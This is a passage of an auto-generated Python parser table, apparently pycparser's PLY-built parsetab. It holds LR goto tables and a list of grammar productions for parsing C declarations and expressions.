expression':([106,152,168,172,177,267,271,272,274,279,280,282,284,302,321,328,332,382,397,460,463,464,465,466,497,507,511,515,522,525,],[169,169,276,169,288,169,276,169,385,392,393,169,169,401,420,276,276,169,169,169,169,169,495,169,169,169,169,524,169,169,]),'assignment_expression':([106,113,116,130,152,168,172,177,216,225,226,239,267,271,272,274,278,279,280,282,284,2
90,302,321,322,328,332,339,347,348,369,382,397,444,460,463,464,465,466,471,476,483,484,497,507,511,515,522,525,],[178,214,224,214,178,178,178,178,224,353,354,224,178,178,178,178,391,178,178,178,178,400,178,178,423,178,178,214,440,441,224,178,178,224,178,178,178,178,178,499,214,505,506,178,178,178,178,178,178,]),'conditional_expression':([106,113,116,130,152,164,168,172,177,216,225,226,239,248,262,267,271,272,274,278,279,280,282,284,290,302,321,322,328,332,339,343,347,348,369,379,382,397,444,460,463,464,465,466,468,471,476,483,484,497,507,511,515,522,525,],[179,179,179,179,179,269,179,179,179,179,179,179,179,269,269,179,179,179,179,179,179,179,179,179,179,179,179,179,179,179,179,269,179,179,179,269,179,179,179,179,179,179,179,179,498,179,179,179,179,179,179,179,179,179,179,]),'unary_expression':([106,113,116,130,152,164,168,172,177,183,184,185,187,216,225,226,239,248,262,267,271,272,274,278,279,280,282,284,290,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,328,332,339,343,347,348,369,379,382,386,397,444,459,460,463,464,465,466,468,471,476,483,484,497,507,511,515,522,525,],[180,180,180,180,180,270,180,180,180,327,329,270,331,180,180,180,180,270,270,180,180,180,180,180,180,180,180,180,180,180,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,270,180,180,180,180,180,270,180,180,180,270,180,270,180,180,270,180,180,180,180,180,270,180,180,180,180,180,180,180,180,180,180,]),'binary_expression':([106,113,116,130,152,164,168,172,177,216,225,226,239,248,262,267,271,272,274,278,279,280,282,284,290,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,328,332,339,343,347,348,369,379,382,397,444,460,463,464,465,466,468,471,476,483,484,497,507,511,515,522,525,],[181,181,181,181,181,181,181,181,181,181,181,181,181,181,181,181,181,181,181,181,181,181,181,181,181,181,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,181,181,181,181,181,181,181,181,181,181,181,181,181,181,181,18
1,181,181,181,181,181,181,181,181,181,181,181,181,181,]),'postfix_expression':([106,113,116,130,152,164,168,172,177,183,184,185,187,216,225,226,239,248,262,267,271,272,274,278,279,280,282,284,290,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,328,332,339,343,347,348,369,379,382,386,397,444,459,460,463,464,465,466,468,471,476,483,484,497,507,511,515,522,525,],[182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,182,]),'unary_operator':([106,113,116,130,152,164,168,172,177,183,184,185,187,216,225,226,239,248,262,267,271,272,274,278,279,280,282,284,290,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,328,332,339,343,347,348,369,379,382,386,397,444,459,460,463,464,465,466,468,471,476,483,484,497,507,511,515,522,525,],[185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,185,]),'cast_expression':([106,113,116,130,152,164,168,172,177,185,216,225,226,239,248,262,267,271,272,274,278,279,280,282,284,290,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,328,332,339,343,347,348,369,379,382,386,397,444,459,460,463,464,465,466,468,471,476,483,484,497,507,511,515,522,525,],[186,186,186,186,186,186,186,186,186,330,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,186,462,186,186,462,186,186,186,186,186,186,186,186,186,186,186,186,186,186,18
6,186,]),'primary_expression':([106,113,116,130,152,164,168,172,177,183,184,185,187,216,225,226,239,248,262,267,271,272,274,278,279,280,282,284,290,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,328,332,339,343,347,348,369,379,382,386,397,444,459,460,463,464,465,466,468,471,476,483,484,497,507,511,515,522,525,],[192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,192,]),'constant':([106,113,116,130,152,164,168,172,177,183,184,185,187,216,225,226,239,248,262,267,271,272,274,278,279,280,282,284,290,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,328,332,339,343,347,348,369,379,382,386,397,444,459,460,463,464,465,466,468,471,476,483,484,497,507,511,515,522,525,],[196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,196,]),'unified_string_literal':([106,113,116,130,152,164,168,172,177,183,184,185,187,216,225,226,239,248,262,267,271,272,274,278,279,280,282,284,290,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,328,332,339,343,347,348,369,379,382,386,397,444,459,460,463,464,465,466,468,471,476,483,484,497,507,511,515,522,525,],[197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,197,]),'unified_wstri
ng_literal':([106,113,116,130,152,164,168,172,177,183,184,185,187,216,225,226,239,248,262,267,271,272,274,278,279,280,282,284,290,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,328,332,339,343,347,348,369,379,382,386,397,444,459,460,463,464,465,466,468,471,476,483,484,497,507,511,515,522,525,],[198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,198,]),'initializer':([113,130,339,476,],[213,243,433,502,]),'assignment_expression_opt':([116,216,239,369,444,],[221,345,367,453,481,]),'typeid_noparen_declarator':([126,],[232,]),'abstract_declarator_opt':([126,277,],[233,388,]),'direct_typeid_noparen_declarator':([126,234,],[235,358,]),'abstract_declarator':([126,238,277,390,],[237,362,237,362,]),'direct_abstract_declarator':([126,234,238,277,364,389,390,],[241,359,241,241,359,359,241,]),'struct_declarator_list_opt':([145,],[255,]),'struct_declarator_list':([145,],[259,]),'struct_declarator':([145,378,],[260,456,]),'constant_expression':([164,248,262,343,379,],[268,374,380,436,457,]),'type_name':([168,271,328,332,335,],[275,383,428,429,430,]),'pragmacomp_or_statement':([172,267,272,382,460,463,464,507,522,525,],[281,381,384,458,490,493,494,518,526,528,]),'assignment_operator':([180,],[290,]),'initializer_list_opt':([215,],[336,]),'initializer_list':([215,461,],[337,492,]),'designation_opt':([215,432,461,509,],[339,476,339,476,]),'designation':([215,432,461,509,],[340,340,340,340,]),'designator_list':([215,432,461,509,],[341,341,341,341,]),'designator':([215,341,432,461,509,],[342,435,342,342,342,]),'parameter_type_list_opt':([238,370,390,],[363,455,363,]),'argument_expression_list':([322,],[421,]),'offsetof_member_designator':([474,],[500,]),}
_lr_goto = {}
for _k, _v in _lr_goto_items.items():
for _x, _y in zip(_v[0], _v[1]):
if not _x in _lr_goto: _lr_goto[_x] = {}
_lr_goto[_x][_k] = _y
del _lr_goto_items
_lr_productions = [
("S' -> translation_unit_or_empty","S'",1,None,None,None),
('abstract_declarator_opt -> empty','abstract_declarator_opt',1,'p_abstract_declarator_opt','plyparser.py',43),
('abstract_declarator_opt -> abstract_declarator','abstract_declarator_opt',1,'p_abstract_declarator_opt','plyparser.py',44),
('assignment_expression_opt -> empty','assignment_expression_opt',1,'p_assignment_expression_opt','plyparser.py',43),
('assignment_expression_opt -> assignment_expression','assignment_expression_opt',1,'p_assignment_expression_opt','plyparser.py',44),
('block_item_list_opt -> empty','block_item_list_opt',1,'p_block_item_list_opt','plyparser.py',43),
('block_item_list_opt -> block_item_list','block_item_list_opt',1,'p_block_item_list_opt','plyparser.py',44),
('declaration_list_opt -> empty','declaration_list_opt',1,'p_declaration_list_opt','plyparser.py',43),
('declaration_list_opt -> declaration_list','declaration_list_opt',1,'p_declaration_list_opt','plyparser.py',44),
('declaration_specifiers_no_type_opt -> empty','declaration_specifiers_no_type_opt',1,'p_declaration_specifiers_no_type_opt','plyparser.py',43),
('declaration_specifiers_no_type_opt -> declaration_specifiers_no_type','declaration_specifiers_no_type_opt',1,'p_declaration_specifiers_no_type_opt','plyparser.py',44),
('designation_opt -> empty','designation_opt',1,'p_designation_opt','plyparser.py',43),
('designation_opt -> designation','designation_opt',1,'p_designation_opt','plyparser.py',44),
('expression_opt -> empty','expression_opt',1,'p_expression_opt','plyparser.py',43),
('expression_opt -> expression','expression_opt',1,'p_expression_opt','plyparser.py',44),
('id_init_declarator_list_opt -> empty','id_init_declarator_list_opt',1,'p_id_init_declarator_list_opt','plyparser.py',43),
('id_init_declarator_list_opt -> id_init_declarator_list','id_init_declarator_list_opt',1,'p_id_init_declarator_list_opt','plyparser.py',44),
('identifier_list_opt -> empty','identifier_list_opt',1,'p_identifier_list_opt','plyparser.py',43),
('identifier_list_opt -> identifier_list','identifier_list_opt',1,'p_identifier_list_opt','plyparser.py',44),
('init_declarator_list_opt -> empty','init_declarator_list_opt',1,'p_init_declarator_list_opt','plyparser.py',43),
('init_declarator_list_opt -> init_declarator_list','init_declarator_list_opt',1,'p_init_declarator_list_opt','plyparser.py',44),
('initializer_list_opt -> empty','initializer_list_opt',1,'p_initializer_list_opt','plyparser.py',43),
('initializer_list_opt -> initializer_list','initializer_list_opt',1,'p_initializer_list_opt','plyparser.py',44),
('parameter_type_list_opt -> empty','parameter_type_list_opt',1,'p_parameter_type_list_opt','plyparser.py',43),
('parameter_type_list_opt -> parameter_type_list','parameter_type_list_opt',1,'p_parameter_type_list_opt','plyparser.py',44),
('struct_declarator_list_opt -> empty','struct_declarator_list_opt',1,'p_struct_declarator_list_opt','plyparser.py',43),
('struct_declarator_list_opt -> struct_declarator_list','struct_declarator_list_opt',1,'p_struct_declarator_list_opt','plyparser.py',44),
('type_qualifier_list_opt -> empty','type_qualifier_list_opt',1,'p_type_qualifier_list_opt','plyparser.py',43),
('type_qualifier_list_opt -> type_qualifier_list','type_qualifier_list_opt',1,'p_type_qualifier_list_opt','plyparser.py',44),
('direct_id_declarator -> ID','direct_id_declarator',1,'p_direct_id_declarator_1','plyparser.py',126),
('direct_id_declarator -> LPAREN id_declarator RPAREN','direct_id_declarator',3,'p_direct_id_declarator_2','plyparser.py',126),
('direct_id_declarator -> direct_id_declarator LBRACKET type_qualifier_list_opt assignment_expression_opt RBRACKET','direct_id_declarator',5,'p_direct_id_declarator_3','plyparser.py',126),
('direct_id_declarator -> direct_id_declarator LBRACKET STATIC type_qualifier_list_opt assignment_expression RBRACKET','direct_id_declarator',6,'p_direct_id_declarator_4','plyparser.py',126),
('direct_id_declarator -> direct_id_declarator LBRACKET type_qualifier_list STATIC assignment_expression RBRACKET','direct_id_declarator',6,'p_direct_id_declarator_4','plyparser.py',127),
('direct_id_declarator -> direct_id_declarator LBRACKET type_qualifier_list_opt TIMES RBRACKET','direct_id_declarator',5,'p_direct_id_declarator_5','plyparser.py',126),
('direct_id_declarator -> direct_id_declarator LPAREN parameter_type_list RPAREN','direct_id_declarator',4,'p_direct_id_declarator_6','plyparser.py',126),
('direct_id_declarator -> direct_id_declarator LPAREN identifier_list_opt RPAREN','direct_id_declarator',4,'p_direct_id_declarator_6','plyparser.py',127),
('direct_typeid_declarator -> TYPEID','direct_typeid_declarator',1,'p_direct_typeid_declarator_1','plyparser.py',126),
('direct_typeid_declarator -> LPAREN typeid_declarator RPAREN','direct_typeid_declarator',3,'p_direct_typeid_declarator_2','plyparser.py',126),
('direct_typeid_declarator -> direct_typeid_declarator LBRACKET type_qualifier_list_opt assignment_expression_opt RBRACKET','direct_typeid_declarator',5,'p_direct_typeid_declarator_3','plyparser.py',126),
('direct_typeid_declarator -> direct_typeid_declarator LBRACKET STATIC type_qualifier_list_opt assignment_expression RBRACKET','direct_typeid_declarator',6,'p_direct_typeid_declarator_4','plyparser.py',126),
('direct_typeid_declarator -> direct_typeid_declarator LBRACKET type_qualifier_list STATIC assignment_expression RBRACKET','direct_typeid_declarator',6,'p_direct_typeid_declarator_4','plyparser.py',127),
('direct_typeid_declarator -> direct_typeid_declarator LBRACKET type_qualifier_list_opt TIMES RBRACKET','direct_typeid_declarator',5,'p_direct_typeid_declarator_5','plyparser.py',126),
('direct_typeid_declarator -> direct_typeid_declarator LPAREN parameter_type_list RPAREN','direct_typeid_declarator',4,'p_direct_typeid_declarator_6','plyparser.py',126),
('direct_typeid_declarator -> direct_typeid_declarator LPAREN identifier_list_opt RPAREN','direct_typeid_declarator',4,'p_direct_typeid_declarator_6','plyparser.py',127),
('direct_typeid_noparen_declarator -> TYPEID','direct_typeid_noparen_declarator',1,'p_direct_typeid_noparen_declarator_1','plyparser.py',126),
('direct_typeid_noparen_declarator -> direct_typeid_noparen_declarator LBRACKET type_qualifier_list_opt assignment_expression_opt RBRACKET','direct_typeid_noparen_declarator',5,'p_direct_typeid_noparen_declarator_3','plyparser.py',126),
('direct_typeid_noparen_declarator -> direct_typeid_noparen_declarator LBRACKET STATIC type_qualifier_list_opt assignment_expression RBRACKET','direct_typeid_noparen_declarator',6,'p_direct_typeid_noparen_declarator_4','plyparser.py',126),
('direct_typeid_noparen_declarator -> direct_typeid_noparen_declarator LBRACKET type_qualifier_list STATIC assignment_expression RBRACKET','direct_typeid_noparen_declarator',6,'p_direct_typeid_noparen_declarator_4','plyparser.py',127),
('direct_typeid_noparen_declarator -> direct_typeid_noparen_declarator LBRACKET type_qualifier_list_opt TIMES RBRACKET','direct_typeid_noparen_declarator',5,'p_direct_typeid_noparen_declarator_5','plyparser.py',126),
('direct_typeid_noparen_declarator -> direct_typeid_noparen_declarator LPAREN parameter_type_list RPAREN','direct_typeid_noparen_declarator',4,'p_direct_typeid_noparen_declarator_6','plyparser.py',126),
('direct_typeid_noparen_declarator -> direct_typeid_noparen_declarator LPAREN identifier_list_opt RPAREN','direct_typeid_noparen_declarator',4,'p_direct_typeid_noparen_declarator_6','plyparser.py',127),
('id_declarator -> direct_id_declarator','id_declarator',1,'p_id_declarator_1','plyparser.py',126),
('id_declarator -> pointer direct_id_declarator','id_declarator',2,'p_id_declarator_2','plyparser.py',126),
('typeid_declarator -> direct_typeid_declarator','typeid_declarator',1,'p_typeid_declarator_1','plyparser.py',126),
('typeid_declarator -> pointer direct_typeid_declarator','typeid_declarator',2,'p_typeid_declarator_2','plyparser.py',126),
('typeid_noparen_declarator -> direct_typeid_noparen_declarator','typeid_noparen_declarator',1,'p_typeid_noparen_declarator_1','plyparser.py',126),
('typeid_noparen_declarator -> pointer direct_typeid_noparen_declarator','typeid_noparen_declarator',2,'p_typeid_noparen_declarator_2','plyparser.py',126),
('translation_unit_or_empty -> translation_unit','translation_unit_or_empty',1,'p_translation_unit_or_empty','parser.py',547),
('translation_unit_or_empty -> empty','translation_unit_or_empty',1,'p_translation_unit_or_empty','parser.py',548),
('translation_unit -> external_declaration','translation_unit',1,'p_translation_unit_1','parser.py',556),
('translation_unit -> translation_unit external_declaration','translation_unit',2,'p_translation_unit_2','parser.py',563),
('external_declaration -> function_definition','external_declaration',1,'p_external_declaration_1','parser.py',574),
('external_declaration -> declaration','external_declaration',1,'p_external_declaration_2','parser.py',579),
('external_declaration -> pp_directive','external_declaration',1,'p_external_declaration_3','parser.py',584),
('external_declaration -> pppragma_directive','external_declaration',1,'p_external_declaration_3','parser.py',585),
('external_declaration -> SEMI','external_declaration',1,'p_external_declaration_4','parser.py',590),
('pp_directive -> PPHASH','pp_directive',1,'p_pp_directive','parser.py',595),
('pppragma_directive -> PPPRAGMA','pppragma_directive',1,'p_pppragma_directive','parser.py',601),
('pppragma_directive -> PPPRAGMA PPPRAGMASTR','pppragma_directive',2,'p_pppragma_directive','parser.py',602),
('function_definition -> id_declarator declaration_list_opt compound_statement','function_definition',3,'p_function_definition_1','parser.py',613),
('function_definition -> declaration_specifiers id_declarator declaration_list_opt compound_statement','function_definition',4,'p_function_definition_2','parser.py',630),
('statement -> labeled_statement','statement',1,'p_statement','parser.py',641),
('statement -> expression_statement','statement',1,'p_statement','parser.py',642),
('statement -> compound_statement','statement',1,'p_statement','parser.py',643),
('statement -> selection_statement','statement',1,'p_statement','parser.py',644),
('statement -> iteration_statement','statement',1,'p_statement','parser.py',645),
('statement -> jump_statement','statement',1,'p_statement','parser.py',646),
('statement -> pppragma_directive','statement',1,'p_statement','parser.py',647),
('pragmacomp_or_statement -> pppragma_directive statement','pragmacomp_or_statement',2,'p_pragmacomp_or_statement','parser.py',694),
('pragmacomp_or_statement -> statement','pragmacomp_or_statement',1,'p_pragmacomp_or_statement','parser.py',695),
('decl_body -> declaration_specifiers init_declarator_list_opt','decl_body',2,'p_decl_body','parser.py',714),
('decl_body -> declaration_specifiers_no_type id_init_declarator_list_opt','decl_body',2,'p_decl_body','parser.py',715),
('declaration -> decl_body SEMI','declaration',2,'p_declaration','parser.py',774),
('declaration_list -> declaration','declaration_list',1,'p_declaration_list','parser.py',783),
('declaration_list -> declaration_list declaration','declaration_list',2,'p_declaration_list','parser.py',784),
('declaration_specifiers_no_type -> type_qualifier declaration_specifiers_no_type_opt','declaration_specifiers_no_type',2,'p_declaration_specifiers_no_type_1','parser.py',794),
('declaration_specifiers_no_type -> storage_class_specifier declaration_specifiers_no_type_opt','declaration_specifiers_no_type',2,'p_declaration_specifiers_no_type_2','parser.py',799),
('declaration_specifiers_no_type -> function_specifier declaration_specifiers_no_type_opt','declaration_specifiers_no_type',2,'p_declaration_specifiers_no_type_3','parser.py',804),
('declaration_specifiers -> declaration_specifiers type_qualifier','declaration_specifiers',2,'p_declaration_specifiers_1','parser.py',810),
('declaration_specifiers -> declaration_specifiers storage_class_specifier','declaration_specifiers',2,'p_declaration_specifiers_2','parser.py',815),
('declaration_specifiers -> declaration_specifiers function_specifier','declaration_specifiers',2,'p_declaration_specifiers_3','parser.py',820),
('declaration_specifiers -> declaration_specifiers type_specifier_no_typeid','declaration_specifiers',2,'p_declaration_specifiers_4','parser.py',825),
('declaration_specifiers -> type_specifier','declaration_specifiers',1,'p_declaration_specifiers_5','parser.py',830),
('declaration_specifiers -> declaration_specifiers_no_type type_specifier','declaration_specifiers',2,'p_declaration_specifiers_6','parser.py',835),
('storage_class_specifier -> AUTO','storage_class_specifier',1,'p_storage_class_specifier','parser.py',841),
('storage_class_specifier -> REGISTER','storage_class_specifier',1,'p_storage_class_specifier','parser.py',842),
('storage_class_specifier -> STATIC','storage_class_specifier',1,'p_storage_class_specifier','parser.py',843),
('storage_class_specifier -> EXTERN','storage_class_specifier',1,'p_storage_class_specifier','parser.py',844),
('storage_class_specifier -> TYPEDEF','storage_class_specifier',1,'p_storage_class_specifier','parser.py',845),
('function_specifier -> INLINE','function_specifier',1,'p_function_specifier','parser.py',850),
('type_specifier_no_typeid -> VOID','type_specifier_no_typeid',1,'p_type_specifier_no_typeid','parser.py',855),
('type_specifier_no_typeid -> _BOOL','type_specifier_no_typeid',1,'p_type_specifier_no_typeid','parser.py',856),
('type_specifier_no_typeid -> CHAR','type_specifier_no_typeid',1,'p_type_specifier_no_typeid','parser.py',857),
('type_specifier_no_typeid -> SHORT','type_specifier_no_typeid',1,'p_type_specifier_no_typeid','parser.py',858),
('type_specifier_no_typeid -> INT','type_specifier_no_typeid',1,'p_type_specifier_no_typeid','parser.py',859),
('type_specifier_no_typeid -> LONG','type_specifier_no_typeid',1,'p_type_specifier_no_typeid','parser.py',860),
('type_specifier_no_typeid -> FLOAT','type_specifier_no_typeid',1,'p_type_specifier_no_typeid','parser.py',861),
('type_specifier_no_typeid -> DOUBLE','type_specifier_no_typeid',1,'p_type_specifier_no_typeid','parser.py',862),
('type_specifier_no_typeid -> _COMPLEX','type_specifier_no_typeid',1,'p_type_specifier_no_typeid','parser.py',863),
('type_specifier_no_typeid -> SIGNED','type_specifier_no_typeid',1,'p_type_specifier_no_typeid','parser.py',864),
('type_specifier_no_typeid -> UNSIGNED','type_specifier_no_typeid',1,'p_type_specifier_no_typeid','parser.py',865),
('type_specifier_no_typeid -> __INT128','type_specifier_no_typeid',1,'p_type_specifier_no_typeid','parser.py',866),
('type_specifier -> typedef_name','type_specifier',1,'p_type_specifier','parser.py',871),
('type_specifier -> enum_specifier','type_specifier',1,'p_type_specifier','parser.py',872),
('type_specifier -> struct_or_union_specifier','type_specifier',1,'p_type_specifier','parser.py',873),
('type_specifier -> type_specifier_no_typeid','type_specifier',1,'p_type_specifier','parser.py',874),
('type_qualifier -> CONST','type_qualifier',1,'p_type_qualifier','parser.py',879),
('type_qualifier -> RESTRICT','type_qualifier',1,'p_type_qualifier','parser.py',880),
('type_qualifier -> VOLATILE','type_qualifier',1,'p_type_qualifier','parser.py',881),
('init_declarator_list -> init_declarator','init_declarator_list',1,'p_init_declarator_list','parser.py',886),
('init_declarator_list -> init_declarator_list COMMA init_declarator','init_declarator_list',3,'p_init_declarator_list','parser.py',887),
('init_declarator -> declarator','init_declarator',1,'p_init_declarator','parser.py',895),
('init_declarator -> declarator EQUALS initializer','init_declarator',3,'p_init_declarator','parser.py',896),
('id_init_declarator_list -> id_init_declarator','id_init_declarator_list',1,'p_id_init_declarator_list','parser.py',901),
('id_init_declarator_list -> id_init_declarator_list COMMA init_declarator','id_init_declarator_list',3,'p_id_init_declarator_list','parser.py',902),
('id_init_declarator -> id_declarator','id_init_declarator',1,'p_id_init_declarator','parser.py',907),
('id_init_declarator -> id_declarator EQUALS initializer','id_init_declarator',3,'p_id_init_declarator','parser.py',908),
('specifier_qualifier_list -> specifier_qualifier_list type_specifier_no_typeid','specifier_qualifier_list',2,'p_specifier_qualifier_list_1','parser.py',915),
('specifier_qualifier_list -> specifier_qualifier_list type_qualifier','specifier_qualifier_list',2,'p_specifier_qualifier_list_2','parser.py',920),
('specifier_qualifier_list -> type_specifier','specifier_qualifier_list',1,'p_specifier_qualifier_list_3','parser.py',925),
('specifier_qualifier_list -> type_qualifier_list type_specifier','specifier_qualifier_list',2,'p_specifier_qualifier_list_4','parser.py',930),
('struct_or_union_specifier -> struct_or_union ID','struct_or_union_specifier',2,'p_struct_or_union_specifier_1','parser.py',939),
('struct_or_union_specifier -> struct_or_union TYPEID','struct_or_union_specifier',2,'p_struct_or_union_specifier_1','parser.py',940),
('struct_or_union_specifier -> struct_or_union brace_open struct_declaration_list brace_close','struct_or_union_specifier',4,'p_struct_or_union_specifier_2','parser.py',950),
('struct_or_union_specifier -> struct_or_union brace_open brace_close','struct_or_union_specifier',3,'p_struct_or_union_specifier_2','parser.py',951),
('struct_or_union_specifier -> struct_or_union ID brace_open struct_declaration_list brace_close','struct_or_union_specifier',5,'p_struct_or_union_specifier_3','parser.py',968),
('struct_or_union_specifier -> struct_or_union ID brace_open brace_close','struct_or_union_specifier',4,'p_struct_or_union_specifier_3','parser.py',969),
('struct_or_union_specifier -> struct_or_union TYPEID brace_open struct_declaration_list brace_close','struct_or_union_specifier',5,'p_struct_or_union_specifier_3','parser.py',970),
('struct_or_union_specifier -> struct_or_union TYPEID brace_open brace_close','struct_or_union_specifier',4,'p_struct_or_union_specifier_3','parser.py',971),
('struct_or_union -> STRUCT','struct_or_union',1,'p_struct_or_union','parser.py',987),
('struct_or_union -> UNION','struct_or_union',1,'p_struct_or_union','parser.py',988),
('struct_declaration_list -> struct_declaration','struct_declaration_list',1,'p_struct_declaration_list','parser.py',995),
('struct_declaration_list -> struct_declaration_list struct_declaration','struct_declaration_list',2,'p_struct_declaration_list','parser.py',996),
('struct_declaration -> specifier_qualifier_list struct_declarator_list_opt SEMI','struct_declaration',3,'p_struct_declaration_1','parser.py',1004),
('struct_declaration -> SEMI','struct_declaration',1,'p_struct_declaration_2','parser.py',1042),
('struct_declaration -> pppragma_directive','struct_declaration',1,'p_struct_declaration_3','parser.py',1047),
('struct_declarator_list -> struct_declarator','struct_declarator_list',1,'p_struct_declarator_list','parser.py',1052),
('struct_declarator_list -> struct_declarator_list COMMA struct_declarator','struct_declarator_list',3,'p_struct_declarator_list','parser.py',1053),
('struct_declarator -> declarator','struct_declarator',1,'p_struct_declarator_1','parser.py',1061),
('struct_declarator -> declarator COLON constant_expression','struct_declarator',3,'p_struct_declarator_2','parser.py',1066),
('struct_declarator -> COLON constant_expression','struct_declarator',2,'p_struct_declarator_2','parser.py',1067),
('enum_specifier -> ENUM ID','enum_specifier',2,'p_enum_specifier_1','parser.py',1075),
('enum_specifier -> ENUM TYPEID','enum_specifier',2,'p_enum_specifier_1','parser.py',1076),
('enum_specifier -> ENUM brace_open enumerator_list brace_close','enum_specifier',4,'p_enum_specifier_2','parser.py',1081),
('enum_specifier -> ENUM ID brace_open enumerator_list brace_close','enum_specifier',5,'p_enum_specifier_3','parser.py',1086),
('enum_specifier -> ENUM TYPEID brace_open enumerator_list brace_close','enum_specifier',5,'p_enum_specifier_3','parser.py',1087),
('enumerator_list -> enumerator','enumerator_list',1,'p_enumerator_list','parser.py',1092),
('enumerator_list -> enumerator_list COMMA','enumerator_list',2,'p_enumerator_list','parser.py',1093),
('enumerator_list -> enumerator_list COMMA enumerator','enumerator_list',3,'p_enumerator_list','parser.py',1094),
('enumerator -> ID','enumerator',1,'p_enumerator','parser.py',1105),
('enumerator -> ID EQUALS constant_expression','enumerator',3,'p_enumerator','parser.py',1106),
('declarator -> id_declarator','declarator',1,'p_declarator','parser.py',1121),
('declarator -> typeid_declarator','declarator',1,'p_declarator','parser.py',1122),
('pointer -> TIMES type_qualifier_list_opt','pointer',2,'p_pointer','parser.py',1233),
('pointer -> TIMES type_qualifier_list_opt pointer','pointer',3,'p_pointer','parser.py',1234),
('type_qualifier_list -> type_qualifier','type_qualifier_list',1,'p_type_qualifier_list','parser.py',1263),
('type_qualifier_list -> type_qualifier_list type_qualifier','type_qualifier_list',2,'p_type_qualifier_list','parser.py',1264),
('parameter_type_list -> parameter_list','parameter_type_list',1,'p_parameter_type_list','parser.py',1269),
('parameter_type_list -> parameter_list COMMA ELLIPSIS','parameter_type_list',3,'p_parameter_type_list','parser.py',1270),
('parameter_list -> parameter_declaration','parameter_list',1,'p_parameter_list','parser.py',1278),
('parameter_list -> parameter_list COMMA parameter_declaration','parameter_list',3,'p_parameter_list','parser.py',1279),
('parameter_declaration -> declaration_specifiers id_declarator','parameter_declaration',2,'p_parameter_declaration_1','parser.py',1298),
('parameter_declaration -> declaration_specifiers typeid_noparen_declarator','parameter_declaration',2,'p_parameter_declaration_1','parser.py',1299),
('parameter_declaration -> declaration_specifiers abstract_declarator_opt','parameter_declaration',2,'p_parameter_declaration_2','parser.py',1310),
('identifier_list -> identifier','identifier_list',1,'p_identifier_list','parser.py',1341),
('identifier_list -> identifier_list COMMA identifier','identifier_list',3,'p_identifier_list','parser.py',1342),
('initializer -> assignment_expression','initializer',1,'p_initializer_1','parser.py',1351),
('initializer -> brace_open initializer_list_opt brace_close','initializer',3,'p_initializer_2','parser.py',1356),
('initializer -> brace_open initializer_list COMMA brace_close','initializer',4,'p_initializer_2','parser.py',1357),
('initializer_list -> designation_opt initializer','initializer_list',2,'p_initializer_list','parser.py',1365),
('initializer_list -> initializer_list COMMA designation_opt initializer','initializer_list',4,'p_initializer_list','parser.py',1366),
('designation -> designator_list EQUALS','designation',2,'p_designation','parser.py',1377),
('designator_list -> designator','designator_list',1,'p_designator_list','parser.py',1385),
('designator_list -> designator_list designator','designator_list',2,'p_designator_list','parser.py',1386),
('designator -> LBRACKET constant_expression RBRACKET','designator',3,'p_designator','parser.py',1391),
('designator -> PERIOD identifier','designator',2,'p_designator','parser.py',1392),
('type_name -> specifier_qualifier_list abstract_declarator_opt','type_name',2,'p_type_name','parser.py',1397),
('abstract_declarator -> pointer','abstract_declarator',1,'p_abstract_declarator_1','parser.py',1408),
('abstract_declarator -> pointer direct_abstract_declarator','abstract_declarator',2,'p_abstract_declarator_2','parser.py',1416),
('abstract_declarator -> direct_abstract_declarator','abstract_declarator',1,'p_abstract_declarator_3','parser.py',1421),
('direct_abstract_declarator -> LPAREN abstract_declarator RPAREN','direct_abstract_declarator',3,'p_direct_abstract_declarator_1','parser.py',1431),
('direct_abstract_declarator -> direct_abstract_declarator LBRACKET assignment_expression_opt RBRACKET','direct_abstract_declarator',4,'p_direct_abstract_declarator_2','parser.py',1435),
('direct_abstract_declarator -> LBRACKET assignment_expression_opt RBRACKET','direct_abstract_declarator',3,'p_direct_abstract_declarator_3','parser.py',1446),
